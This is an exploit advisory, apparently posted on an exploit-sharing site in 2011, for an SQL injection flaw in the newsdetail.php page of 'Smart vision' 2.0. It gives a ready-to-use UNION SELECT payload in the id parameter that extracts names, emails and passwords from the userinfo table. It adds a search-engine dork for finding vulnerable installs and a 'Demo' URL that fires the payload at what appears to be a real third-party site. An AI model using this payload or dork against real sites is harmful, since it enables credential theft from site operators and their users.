smart vision (newsdetail.php) SQL Injection Vulnerability



EKU-ID: 313 CVE: OSVDB-ID:
Author: Net.Edit0r Published: 2011-05-24 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


###################################################
# |Title            : smart vision (newsdetail.php) SQL Injection Vulnerability
# | Software        : Smart vision
# | Version         : 2.0
# | Date            : 23 / 05 / 2011
# | Author          : Net.Edit0r
# | Contact         : Black.hat.tm@Gmail.Com & Net.Edit0r@att.net
# | Google Dork     : "Powered by smart vision"
# | Vendor          :  http://www.esmart-vision.com/
# | My Home         :  http://black-hg.OrG
##################################################
# | Exploit :
# | http://www.127.0.0.1/newsdetail.php?id=1%20and%201%20=0%20union%20all%20select%201,2,3,4,5,6,group_concat%28Name,CHAR%2861%29,Email,CHAR%2861%29,Password%29%20from%20userinfo
##################################################
# | Greetz :
# | DarkCoder | Amir-MaGiC | 3H34N | H3x |  Cho0bin | D3adlY |
##################################################
Demo :
http://www.almurabaha.com/newsdetail.php?id=1%20and%201%20=0%20union%20all%20select%201,2,3,4,5,6,group_concat%28Name,CHAR%2861%29,Email,CHAR%2861%29,Password%29%20from%20userinfo
##################################################
magic_quotes_gpc :: Off
##################################################
I Love Iran And All Iranian People
##################################################